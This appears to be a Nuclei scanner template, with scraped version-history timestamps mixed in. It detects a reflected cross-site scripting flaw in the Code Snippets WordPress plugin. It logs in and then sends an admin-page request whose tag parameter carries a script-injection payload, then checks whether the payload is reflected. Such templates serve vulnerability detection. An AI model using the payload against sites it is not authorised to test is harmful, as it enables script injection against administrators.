2022-01-30 20:26:39 +00:00
id : wp-code-snippets-xss
info :
2022-05-13 20:26:43 +00:00
name : Code Snippets Wordpress Plugin - Cross-Site Scripting
2022-01-30 20:26:39 +00:00
author : dhiyaneshDK
severity : medium
2022-04-22 10:38:41 +00:00
description : A reflected Cross-Site Scripting (XSS) vulnerability has been found in the Code Snippets WordPress Plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application,
which will execute within the browser of any logged-in admin who views the link
reference :
- https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/
2022-01-30 20:26:39 +00:00
tags : wordpress,xss,wp-plugin,authenticated
requests :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=snippets&tag=</script><script>alert(document.domain)</script> HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
matchers-condition : and
matchers :
- type : word
part : body
words :
- '</script><script>alert(document.domain)</script>'
2022-04-29 15:01:22 +00:00
- 'toplevel_page_snippets'
- 'Search results in tag'
condition : and
2022-01-30 20:26:39 +00:00
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200